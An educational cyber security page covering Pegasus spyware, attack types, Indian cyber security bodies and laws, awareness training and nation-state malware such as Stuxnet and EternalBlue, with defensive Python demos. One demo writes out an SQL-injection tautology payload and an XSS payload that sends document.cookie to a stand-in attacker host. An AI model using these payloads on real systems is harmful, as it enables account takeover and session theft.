Pegasus – A threat to your Privacy

What is Pegasus?

  • It is a type of malicious software, or malware, classified as spyware.
  • It is designed to gain access to devices without the knowledge of their users, gather personal information and relay it back to whoever is operating the software.
  • Pegasus was developed by the Israeli firm NSO Group, founded in 2010.
  • The earliest version of Pegasus discovered, captured by researchers in 2016, infected phones through spear-phishing: text messages or emails that trick a target into clicking a malicious link.
  • Since then NSO’s attack capabilities have become more advanced. Pegasus infections can now be achieved through so-called “zero-click” attacks, which need no interaction from the phone’s owner in order to succeed.
  • These typically exploit “zero-day” vulnerabilities: flaws in the operating system that the phone’s manufacturer does not yet know about and so has not been able to patch. Keeping the OS current closes the holes that have already been fixed, but offers no protection against a zero-day that is still unknown to the vendor.

What are the types of cyber attacks?

  • Malware: Short for malicious software; any software designed to damage or take control of a single computer, server or network. Ransomware, spyware, worms, viruses and Trojans are all varieties of malware.
  • Phishing: Gathering personal information, such as credentials or card numbers, through deceptive e-mails and websites that impersonate a trusted party.
  • Denial of Service attacks: A Denial-of-Service (DoS) attack is meant to shut down a machine or network, making it inaccessible to its intended users, either by flooding the target with traffic or by sending it input that triggers a crash. When the flood comes from many compromised machines at once it is a Distributed DoS (DDoS).
  • Man-in-the-middle (MitM) attacks: Also known as eavesdropping attacks, these occur when attackers insert themselves into a two-party exchange. Once positioned between the parties they can read, alter or steal the data in transit; TLS with proper certificate validation is the usual defence.
  • SQL Injection: SQL (Structured Query Language) is the language used to talk to relational databases, and many of the servers that hold critical data for websites and services manage it with SQL. An SQL injection attack targets applications that build queries by pasting user input into SQL text, so that crafted input is interpreted as part of the query and makes the database return, modify or delete data it otherwise would not. The standard fix is parameterised queries, which bind input as data rather than code.
  • Cross-Site Scripting (XSS): Like SQL injection, XSS involves injecting malicious code into a website, but here the code is HTML or JavaScript and the victim is the visitor rather than the site. The vulnerable site merely delivers the attacker’s script, which then runs in the visitor’s browser with that site’s privileges and can steal session data or act on the user’s behalf. Output encoding of untrusted data, backed by a Content Security Policy, is the usual defence.
  • Social Engineering: An attack that relies on human interaction to trick users into breaking security procedures in order to obtain sensitive information that is normally protected.
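The SQL injection and XSS items above, as an added example that is not part of the original page: a Python script with a constructed in-memory SQLite table and a constructed HTML template. It shows the string-built login query that a single attacker input turns into a tautology beside its parameterised form, and a comment rendered raw beside the same comment HTML-encoded. The table, the user rows and the payloads are all invented for illustration.

```python
# Added example, not code from the original page: the two injection attacks
# described above, run against a constructed in-memory SQLite table and a
# constructed HTML template. Nothing here touches a real database or site.
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Throwaway in-memory database with two constructed user rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "correct-horse"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Builds the query by string formatting, so user input becomes SQL syntax.

    With password = "' OR '1'='1" the WHERE clause becomes
        username = 'alice' AND password = '' OR '1'='1'
    and the trailing OR makes it true for every row in the table.
    """
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return sorted(row[0] for row in conn.execute(query))


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterised query: the driver binds input as data, never as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(query, (username, password)))


# Constructed page template; {comment} is where untrusted text is inserted.
PAGE = "<html><body><p>Latest comment: {comment}</p></body></html>"


def render_vulnerable(comment: str) -> str:
    """Inserts untrusted text verbatim: any <script> in it runs in the visitor's browser."""
    return PAGE.format(comment=comment)


def render_safe(comment: str) -> str:
    """HTML-encodes the metacharacters (< > & " ') so the browser shows them as text."""
    return PAGE.format(comment=html.escape(comment, quote=True))


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"
    print("vulnerable login:", login_vulnerable(db, "alice", tautology))  # ['alice', 'bob']
    print("safe login:     ", login_safe(db, "alice", tautology))         # []
    xss = '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'
    print(render_vulnerable(xss))
    print(render_safe(xss))
```

The vulnerable login returns every user because the attacker-controlled string changed the shape of the query; the parameterised version returns nothing because the same string is compared literally against the password column. The same distinction applies to XSS: `html.escape` does not remove the attacker's text, it only stops the browser from parsing it as markup.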

What are the initiatives taken by the government to tackle the issue of cyber attacks?

  • Cyber Surakshit Bharat Initiative: Launched in 2018 to spread awareness of cybercrime and to build capacity in safety measures for Chief Information Security Officers (CISOs) and frontline IT staff across government departments.
  • National Cyber Security Coordination Centre (NCCC): Set up in 2017 to scan internet traffic and communication metadata (information about a communication, such as its sender, recipient, timing and size, rather than its content) entering the country, in order to detect cyber threats in real time.
  • Cyber Swachhta Kendra: Introduced in 2017 as a botnet cleaning and malware analysis centre, providing tools with which internet users can detect and remove malware from their computers and devices.
  • Indian Cyber Crime Coordination Centre (I4C): Inaugurated by the government in 2020 to coordinate the handling of cybercrime across agencies.
  • National Cyber Crime Reporting Portal: Launched pan-India so that citizens can report cybercrime online.
  • Indian Computer Emergency Response Team (CERT-In): The nodal agency for responding to cyber security incidents such as hacking and phishing and for issuing advisories.

Laws in India related to Cyber Security

  • Information Technology Act, 2000.
  • Personal Data Protection Bill, 2019.
  • International Telecommunication Union (ITU): Not an Indian law, but a specialised agency of the United Nations, of which India is a member state, that plays a leading role in the standardisation and development of telecommunications and in international cyber security cooperation.

Seven reasons why security awareness training is essential

1. To avoid breaches and assaults.

To begin with the most obvious, security awareness training helps prevent breaches. It is impossible to estimate exactly how many breaches training avoids. In an ideal world we would run a randomised controlled experiment comparing people who received training with those who did not.

This is a step too far for most organisations. However, it does not stop us from demonstrating the return on investment (ROI) of security awareness programmes. It is feasible to compare the number of incidents before and after awareness efforts, and the resulting measurements can be used to estimate ROI. Data breaches can cost millions; security awareness training, by comparison, is inexpensive. It does not take much to produce a significant return.

2. Establishing a security culture

A security culture has long been seen as the holy grail for chief information security officers (CISOs). It is also widely regarded as notoriously difficult to build. Some organisations are moving in the right direction with the help of security awareness training.

Creating a security culture means weaving security values into the fabric of the organisation. Training that includes situational awareness (why someone might be at risk) and shows the benefits both at work and at home is an effective way to get people on board. Advanced training tools can help monitor and develop a security culture, making people your first line of defence.

3. Strengthening technical defences

Technical defences are an effective tool for preventing intrusions, but they require human input. Firewalls must be enabled. Security alerts must be acted on. Software must be updated. Few firms today would operate without technical safeguards, yet those safeguards cannot reach full effectiveness without security awareness training. Today’s attackers rarely bother to target firms through purely technical means; they generally target individuals, who are seen as an easier route into otherwise secure networks.

4. To instil trust in your consumers

Consumers are increasingly conscious of cyber threats. They want to feel protected and secure as customers. A company that takes visible steps to strengthen its cyber security has a better chance of earning customer trust, and a trusted company is one that retains its customers.

This is not a guess. According to an Arcserve poll, 70% of consumers feel businesses are not doing enough to protect cyber security, and almost two in three would avoid doing business with a company that had suffered a cyber attack in the previous year. Customers clearly care about security credentials, and they regard you as more responsible when you implement security awareness training. That can only be a positive thing.

5. To ensure compliance

To be clear, introducing security awareness training purely for the sake of compliance is not enough; those who train merely to meet regulatory requirements risk doing the bare minimum. Nonetheless, a growing number of regulators require particular businesses to carry out security awareness training.

“Firms of all sizes must establish a ‘security culture,’ starting with the board and working their way down to every employee. Cyber security is a shared responsibility, and we adopt a collaborative approach to combating this danger, collaborating with the government, other regulators, and stakeholders on a national and worldwide scale.”

Compliance can be a pleasant side effect of security awareness training. Those that use it improve their security and, in many cases, satisfy regulatory obligations.

6. Being a socially responsible business

Cyber attacks can spread quickly, as WannaCry and NotPetya showed in 2017. The more compromised networks there are, the more exposed other networks become, and the weakness of one network raises the total risk for all the others.

The lack of security awareness training in one organisation exposes other organisations to risk. It’s a little like leaving your front door unlocked with the keys to the next door inside.

Security awareness training is beneficial to more than just you. It benefits your customers, suppliers, and everyone else who is connected to your network.

7. To boost staff morale

It is generally accepted that happy people are more productive. So it is worth recognising that security awareness training does more than keep employees safe at work; it also keeps them safe in their personal lives.

This specific benefit, for the most part, goes unnoticed. If security awareness training serves its purpose, it is more than just an employer perk. It’s also a perk for employees.

List of Malwares

A list of the most dangerous, effective and best-known malware strains developed by the cyber units of various countries’ intelligence and military branches. The attributions given below are those made publicly by security researchers and governments; attribution of malware to a specific actor is rarely certain.

Regin

Regin, widely regarded as the most powerful malware family ever produced by a nation-state actor, is reported to have been created by the NSA and shared with some of its Five Eyes allies (primarily GCHQ). Its existence was made public in 2014, but the first samples date back to 2011, and some suspect the malware was produced as early as 2003. Regin has been used in the wild in incidents involving the Belgian telecom Belgacom, German government bodies and, most recently, the Russian search firm Yandex.

On a technical level, security researchers consider Regin the most complex malware framework to date, with modules covering dozens of features, most of them designed to perform surveillance and remain unnoticed on infected systems.

Flame

Flame was found in 2012, and at the time security experts hesitated to call it mere “malware”: it was so sophisticated that the phrase “attack toolkit” was used to describe its structure, which resembled that of its larger sibling, Regin. Flame is a collection of modules that run on top of a core framework and are installed according to the capabilities its operators want. It was identified in 2012 by the MAHER Center of Iran’s national CERT in attacks on government entities in the country. The discovery came two years after the Stuxnet attacks and was quickly connected to the Equation Group, a researchers’ codename for a group widely linked to the US National Security Agency. Flame was later detected in attacks on other Middle Eastern governments as well; Flame’s Wikipedia page currently has the best summary of all Flame-related findings.

Stuxnet

Stuxnet is the only malware on this list with its own documentary film. The malware was co-developed in the 2000s by the US NSA and Israel’s Unit 8200, the Israeli military’s cyber division, and was discovered in 2010 after being deployed in Iran as part of a joint effort by the two countries to sabotage Iran’s nuclear programme.

Stuxnet, which is said to have used four different zero-days when it was unleashed, was specifically coded to target industrial control systems. It modified the settings of the centrifuges used for uranium enrichment, repeatedly raising and lowering rotor speeds to induce vibrations and destroy the machines, while replaying recorded normal readings to the operators’ monitoring systems so that the sabotage went unnoticed. The malware is said to have infected over 200,000 computers and eventually destroyed nearly 1,000 centrifuges at Iran’s Natanz enrichment facility.

Shamoon

The first non-US developed malware on this list is Shamoon, a malware strain developed by Iran’s state hackers. It was first deployed in 2012 on the network of Saudi Aramco, Saudi Arabia’s largest oil producer. The malware, a data wiper, destroyed over 30,000 computers in the 2012 attack. It was deployed in a second attack in 2016, against the same target. Most recently, it’s been deployed against Italian oil and gas contractor Saipem, allegedly destroying 10% of the company’s PC fleet.

Triton

A more recent addition to this list is Triton (also known as Trisis). This malware is believed to have been developed by a Russian research laboratory and was deployed in 2017 against a petrochemical plant in Saudi Arabia. It was specifically engineered to interact with Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers. According to technical reports from FireEye, Dragos and Symantec, Triton was designed either to shut down a production process or to let Triconex-controlled machinery run in an unsafe state. The malware’s code leaked and was eventually published on GitHub.

Industroyer

The Industroyer malware, also known as Crashoverride, is a malware framework developed by Russian state hackers and deployed in December 2016, in the cyber-attacks against Ukraine’s power grid.

The attack was successful and cut power to part of Kyiv, Ukraine’s capital, for about an hour. The malware is considered an evolution of earlier ICS-focused strains such as Havex and BlackEnergy, the latter used in the December 2015 attack on Ukraine’s grid. Unlike those, which were essentially generic Windows malware deployed against the systems that manage industrial equipment, Industroyer contained components that speak grid protocols directly (IEC 60870-5-101 and -104, IEC 61850 and OPC DA), along with a module for knocking Siemens SIPROTEC protection relays offline.

Duqu

Believed to be the creation of Israel’s infamous Unit 8200 military cyber-unit, Duqu was discovered by Hungarian security researchers in 2011. A second version was discovered in 2015, and was codenamed Duqu 2.0. The first version was deployed to aid Stuxnet attacks, while the second was used to compromise the network of Russian antivirus firm Kaspersky Lab. Duqu 2.0 was also found on computers in hotels in Austria and Switzerland where the international negotiations between the US/EU and Iran took place, over its nuclear program and economic sanctions.

PlugX

PlugX is a remote access trojan (RAT) first seen in 2012, in attacks attributed to Chinese nation-state hackers. Since its discovery, Chinese groups appear to have shared the malware among themselves, and it is now widely used by most Chinese nation-state groups, which makes attribution to any one group very difficult.

Winnti

Winnti is very similar to PlugX. It’s another Chinese-made APT malware strain that was initially used by one group but was then shared among all the Chinese APTs as time went by. The malware has been around since 2011 and is described as a modular backdoor trojan. Security researchers recently discovered a Linux variant.

Uroburos

Uroburos was the rootkit developed by the Turla group, one of the world’s most advanced nation-state hacker groups, linked to the Russian government. According to a G DATA report, “the rootkit is able to take control of an infected machine, execute arbitrary commands and hide system activities.”

Uroburos (also referred to as the Turla or Snake rootkit) was widely deployed and was very efficient for the limited purpose it was being used for — to gain boot persistence and download other malware strains. It was the central piece of Turla APT attacks and had been seen on infected computers in Europe, the US, and the Middle East, as early as 2008. Targets usually included government entities. It was seen in 45 countries. A Linux variant was also discovered in 2014.

ICEFOG

Yet another piece of Chinese malware that was once used by one group, but was later shared and re-used by others. ICEFOG, first spotted in 2013, made a comeback in the last two years, with new variants, and even a Mac version.

WARRIOR PRIDE

The only mobile malware on this list, WARRIOR PRIDE is a tool jointly developed by the US NSA and the UK’s GCHQ. It works on both Android and iOS, and its existence became public in 2014 through the Snowden leaks. In terms of capabilities the iPhone variant was far more advanced than the Android one: it could retrieve any content from infected devices, listen to nearby conversations by silently enabling the microphone, and could work even when the phone was in sleep mode.

Olympic Destroyer

The Olympic Destroyer malware was deployed in an attack that crippled internet connections during the opening ceremony of the Pyeongchang 2018 Winter Olympics. TV stations and journalists were the most affected. The malware was reportedly created by Russian hackers and deployed as payback for the International Olympic Committee banning Russian athletes over doping charges, or allowing them to compete only under a neutral flag rather than the Russian one.

The malware itself was an information stealer that dumped app passwords on infected systems, which hackers later used to escalate their access to other systems, from where they later triggered a data-wiping attack that brought down some servers and routers. New Olympic Destroyer versions were spotted in June 2018, months after the initial attacks.

VPNFilter

The only APT-developed malware on this list built to infect routers is VPNFilter. Developed by Russian state hackers, the malware had been deployed in advance of the 2018 Champions League final in Kyiv, Ukraine. The presumed plan was to use it to damage routers during the live broadcast of the final, much as Olympic Destroyer had been used to cripple internet connections during the opening ceremony of the Pyeongchang 2018 Winter Olympics.

Fortunately, security researchers from Cisco Talos saw the VPNFilter botnet being assembled, and took it down with the help of the FBI. The malware was supposedly created by the Fancy Bear APT, according to the FBI.

 

WannaCry

All three ransomware outbreaks of 2017 were malware strains developed by nation-state hackers, albeit for different reasons.

The first, WannaCry, was developed by North Korean state hackers for the sole purpose of infecting victims and collecting ransoms for the Pyongyang regime, which at the time was under heavy economic sanctions. To soften the impact of those sanctions, the regime used state hackers to rob banks, mine cryptocurrency and run ransomware operations. Errors in WannaCry’s code, however, meant that its self-replicating (worm) component, instead of spreading only across local networks, scanned and infected everything it could reach over the internet, causing a global outbreak.

NotPetya

Two months after WannaCry, a second ransomware outbreak hit the world. Called NotPetya, it was initially deployed only in Ukraine, through a poisoned update of the M.E.Doc accounting software, and has been attributed by Western governments to Russia’s GRU (the Sandworm group, rather than APT28/Fancy Bear as is sometimes stated). Because of shared networks and enterprise VPNs the malware spread globally, much like WannaCry, causing billions of dollars in damage. Like WannaCry, NotPetya used the EternalBlue exploit as a centrepiece of its worm component, alongside stolen credentials and legitimate administration tools such as PsExec and WMI (see the EternalBlue section below).

Bad Rabbit

The last global ransomware outbreak of 2017 was also the work of state hackers. Like NotPetya, Bad Rabbit was the work of Russian hackers, who similarly deployed it in Ukraine; it then spread worldwide, although with a smaller impact than WannaCry and NotPetya. Unlike NotPetya it did not rely on EternalBlue as its primary spreading mechanism, favouring a hard-coded list of credentials tried against SMB shares, and its code included numerous Game of Thrones references.

 

EternalBlue

EternalBlue may not be malware per se, in the classical meaning of the word, being more of an exploit, but it was still developed by a nation-state entity and belongs on this list. It was created by the NSA and became public in April 2017, when a group of mysterious hackers known as The Shadow Brokers published the code online.

After its release it was first used in cryptocurrency mining campaigns, but it became a widely known term once it was embedded in the three ransomware outbreaks of 2017: WannaCry, NotPetya and Bad Rabbit. Since then EternalBlue has refused to die and has been used by all sorts of criminal operations as a mechanism for spreading to other systems inside compromised networks. It exploits a flaw in the SMBv1 server component of Windows (CVE-2017-0144, patched by Microsoft in March 2017 as MS17-010), so a host is exposed only if it is unpatched and still has SMBv1 enabled and reachable on TCP port 445. Disabling SMBv1 and blocking inbound 445 at network boundaries are the standard mitigations.
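Whatever exploit a worm carries, the spreading behaviour described above looks the same on the wire: one host opening SMB connections to many peers in a short time. As an added example that is not part of the original page, here is a small Python detector for that pattern, run over constructed firewall-style log lines. The log format, the addresses and the thresholds (ten distinct TCP/445 targets within sixty seconds) are assumptions chosen for illustration.

```python
# Added example, not code from the original page: a detector for the worm-style
# lateral spread that EternalBlue-equipped malware used, written over constructed
# firewall-style log lines. The log format and the thresholds are assumptions.
from collections import defaultdict
from datetime import datetime
import re

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) proto=(?P<proto>\w+)"
)


def _constructed_log() -> str:
    """Build sample lines: one ordinary client and one host sweeping TCP/445."""
    lines = []
    # Ordinary client: repeated connections to a single file server over five minutes.
    for minute in range(5):
        lines.append(
            f"2017-05-12T10:0{minute}:00Z src=10.0.1.50 dst=10.0.1.5 dport=445 proto=tcp action=allow"
        )
    # Sweeper: 20 distinct hosts on TCP/445 within ten seconds, as a worm scanning a /24 would.
    for i in range(20):
        lines.append(
            f"2017-05-12T10:01:{i % 10:02d}Z src=10.0.1.15 dst=10.0.1.{20 + i} dport=445 proto=tcp action=allow"
        )
    # Unrelated HTTPS traffic from the sweeper; the 445 filter must ignore it.
    lines.append("2017-05-12T10:01:05Z src=10.0.1.15 dst=10.0.1.99 dport=443 proto=tcp action=allow")
    return "\n".join(lines)


SAMPLE_LOG = _constructed_log()


def parse_smb_events(log_text: str) -> list:
    """Return (timestamp, src, dst) for every TCP/445 connection in the log."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["dport"] != "445" or m["proto"] != "tcp":
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["src"], m["dst"]))
    return events


def smb_sweepers(log_text: str, window_seconds: int = 60, min_targets: int = 10) -> dict:
    """Map each source to the largest number of distinct TCP/445 targets it
    contacted inside any window of window_seconds, keeping only sources that
    reach min_targets. A single host fanning out to many peers on 445 is the
    signature of SMB worm propagation, whatever exploit it carries."""
    by_src = defaultdict(list)
    for ts, src, dst in parse_smb_events(log_text):
        by_src[src].append((ts, dst))

    alerts = {}
    for src, events in by_src.items():
        events.sort()
        best, left = 0, 0
        for right in range(len(events)):
            # Advance the left edge until the window fits inside window_seconds.
            while (events[right][0] - events[left][0]).total_seconds() > window_seconds:
                left += 1
            distinct = len({dst for _, dst in events[left:right + 1]})
            best = max(best, distinct)
        if best >= min_targets:
            alerts[src] = best
    return alerts


if __name__ == "__main__":
    for src, count in smb_sweepers(SAMPLE_LOG).items():
        print(f"ALERT {src}: {count} distinct hosts on TCP/445 within 60s")
```

The ordinary client talks to one server repeatedly and never trips the threshold; the sweeper contacts twenty distinct hosts within ten seconds and is flagged. In production the thresholds would be tuned against baseline traffic, because backup servers and vulnerability scanners legitimately fan out on 445 too.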


CYBER SECURITY

Protecting networks, data, programs and other information from unauthorised access, alteration or destruction is the most basic definition of cyber security. Because of the scale of recent cyber attacks, cyber security has become a priority all over the world. Many companies develop software to protect data, and such software secures not only the data itself but the systems that process it against malware. India has the second-largest internet user base in the world after China, ahead of the United States.

What is the significance of cyber security in today’s society?

You need cyber security in the same way the world needs the ozone layer to shield it from the sun’s harmful ultraviolet radiation, and just as holes in the ozone layer affect our civilisation’s future, so do holes in your company’s defences. Attackers have become more active on the internet over the past few years, using advanced techniques to infect unsuspecting individuals and businesses with malware, ransomware and other destructive attacks. Most of the time you will not know whether you have been compromised.

Cyber security risks are more widespread than you might believe: by some estimates an attack occurs somewhere in the world every twenty seconds. Fundamentally, our society is more dependent on technology than ever, and there is no sign that this trend will reverse. Personal details that could enable identity theft are routinely posted on social media accounts, and Social Security numbers, card numbers and bank account details are now kept in cloud storage services such as Dropbox or Google Drive.

Cyber Security Threats and Attacks:

Malware: The most common type of cyber attack is a malware attack. Malware is harmful software, such as spyware, ransomware, viruses and worms, that is installed on a computer when a user clicks a malicious link or opens a malicious email attachment. Once it has a foothold, malware can block access to essential network components, damage the system and collect confidential information, among other things.

Phishing is a type of fraud in which fake emails posing as messages from trusted sources are sent with the purpose of stealing sensitive data such as card numbers or login credentials.
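The “posing as a trusted source” part is where a mail gateway or analyst can push back. As an added example that is not part of the original page, here is a Python script that applies three header-level checks to a message: a display name that claims a trusted brand while the address is on another domain, a lookalike domain built from confusable characters, and Return-Path or Reply-To addresses on a different domain from the From address. The trusted brand list, the confusable rules and both sample messages are constructed for illustration; a real filter would also verify SPF, DKIM and DMARC results.

```python
# Added example, not code from the original page: header-level checks for the
# "email posing as a trusted source" pattern described above. The trusted brand
# list, the confusable-character rules and both messages are constructed here.
from email import message_from_string
from email.utils import parseaddr

# Brand names attackers like to impersonate, with the domain each really uses.
TRUSTED_BRANDS = {"paypal": "paypal.com", "microsoft": "microsoft.com"}

# Character swaps commonly used in lookalike domains (paypa1 -> paypal, rnicrosoft -> microsoft).
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def registrable(domain: str) -> str:
    """Crude registrable-domain guess (last two labels). A real deployment would
    use the public suffix list so that e.g. example.co.uk is handled correctly."""
    labels = domain.lower().strip().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else domain.lower()


def normalise(domain: str) -> str:
    """Undo the confusable substitutions so lookalikes collapse onto the brand name."""
    out = domain.lower()
    for fake, real in CONFUSABLES:
        out = out.replace(fake, real)
    return out


def address_domain(header_value: str) -> str:
    """Domain part of the address inside a header value, or '' if there is none."""
    _, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def sender_findings(raw_message: str) -> list:
    """Return human-readable reasons the From header looks like impersonation."""
    msg = message_from_string(raw_message)
    display_name, _ = parseaddr(msg.get("From", ""))
    from_domain = address_domain(msg.get("From", ""))
    from_reg = registrable(from_domain)
    findings = []

    for brand, real_domain in TRUSTED_BRANDS.items():
        if from_reg == real_domain:
            continue  # genuinely sent from the brand's own domain
        if brand in display_name.lower():
            findings.append(f"display name claims {brand!r} but address domain is {from_domain}")
        if brand in normalise(from_reg).split(".")[0]:
            findings.append(f"lookalike domain {from_domain} resembles {real_domain}")

    # Bounce and reply addresses on a different domain are a classic spoofing tell.
    for header in ("Return-Path", "Reply-To"):
        domain = address_domain(msg.get(header, ""))
        if domain and registrable(domain) != from_reg:
            findings.append(f"{header} domain {domain} does not match From domain {from_domain}")
    return findings


# Constructed messages: one impersonation attempt, one genuine-looking notification.
PHISH = """\
From: "PayPal Support" <security@paypa1-verify.com>
Return-Path: <bounce@mail-relay.example.net>
Reply-To: <refunds@paypa1-verify.com>
To: victim@example.org
Subject: Action required: confirm your account

Please sign in at the link below within 24 hours.
"""

LEGIT = """\
From: "PayPal" <service@paypal.com>
Return-Path: <bounces@paypal.com>
To: victim@example.org
Subject: Your receipt

Thanks for your payment.
"""

if __name__ == "__main__":
    for label, raw in (("phish", PHISH), ("legit", LEGIT)):
        print(label, sender_findings(raw) or ["no findings"])
```

The constructed phishing message trips all three checks (brand in the display name, `paypa1` normalising to `paypal`, and a Return-Path on an unrelated relay domain), while the genuine-looking message produces none. Heuristics like these are cheap to evade individually, which is why they are combined with authentication results rather than used alone.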

Ransomware attacks use a type of malware in which the attacker encrypts the victim’s files and then demands payment for the key needed to decrypt them. According to Mimecast’s The State of Email Security Report 2020, 51 percent of organisations were affected by ransomware in the preceding 12 months.

Distributed denial-of-service (DDoS) attacks: A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt regular traffic on a targeted server, service, or network by flooding the target or its surrounding infrastructure with Internet traffic.

Social engineering attacks can be carried out in several ways. The attacker first researches the intended victim to gather background information such as possible avenues of entry and weak security practices, then works to gain the victim’s trust and provide a pretext for actions that violate security policy, such as disclosing sensitive data or granting access to critical resources.